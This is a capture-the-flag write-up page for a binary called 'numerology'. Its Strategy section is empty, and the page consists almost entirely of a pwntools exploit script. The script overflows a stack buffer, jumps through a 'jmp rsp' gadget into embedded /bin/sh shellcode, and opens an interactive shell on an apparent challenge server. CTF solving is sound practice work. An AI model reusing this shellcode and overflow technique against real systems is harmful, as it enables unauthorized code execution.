C
C
CTF - Info/Codes/Notes
CTF WriteUps & Info/Codes/Notes Repo 2021
Search…
⌃K

Numerology

Strategy

Exploit

#!/usr/bin/env python3
from pwn import *
exe = ELF("./numerology")
context.log_level = 'info'
args.LOCAL=False
args.DEBUG=True
context.binary = exe
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r,gdbscript="""
""")
else:
r = remote("143.255.251.233", 13373)
return r
def main():
#0x000000000040119e : jmp rsp # ROP to JMP RSP for Execute our Shellcode
offjmp4 = 0x72 # Offset JMP to JMP from our Stack pos to the position of the Shellcode
shell=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05' #Shellcode
offset=36-len(shell) # 36 is our Overflow, So this takes Shell - 36 to add PAD
r = conn()
r.sendline(b'A'*offset + shell + p64(0x000000000040119e) +asm('jmp $-'+hex(offjmp4)))
r.interactive()
if __name__ == "__main__":
main()
Last modified 1yr ago